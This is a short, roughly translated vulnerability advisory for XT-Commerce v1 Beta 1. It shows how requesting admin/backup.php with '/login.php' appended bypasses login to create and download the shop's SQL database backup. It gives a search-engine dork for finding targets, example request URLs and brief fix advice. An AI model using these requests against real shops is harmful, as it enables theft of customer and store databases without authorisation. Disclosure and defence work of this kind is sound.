First launch: Hongke Network Security
Author: Amxking
Submit: indoushka
Vulnerability: XT-Commerce v1 Beta 1
Affected Versions: v1 Beta 1
Risk Level: Medium
Vulnerability description:
Amxking: This vulnerability was obtained when I spoke with the Avengers team outside China. It was published by indoushka. I translated, supplemented, edited, and published the vulnerability, this vulnerability is a method for obtaining backup database information. The translation is provided to the members of the Group. The principle is very simple and there is nothing special about it. Let's briefly introduce the process:
Vulnerability exploitation:
1. Search for Powered by XT-Commerce by google or use the target of the set of Programs
2. Backup:
Http://bbs.honkwin.com/XT-Commerce/admin/backup.php/login.php? Action = backupnow
3. Download backup: http://bbs.honkwin.com/XT-Commerce/admin/backup.php/login.php? Action = download & file = db_comm-20100301222138. SQL
Note: if you cannot download it using IE, we recommend that you download it using Mozilla Firefox10.10.
Security suggestions:
1. Background permissions and authentication.
2. We recommend that you keep the backup database path out of the web directory and strictly control the access permission.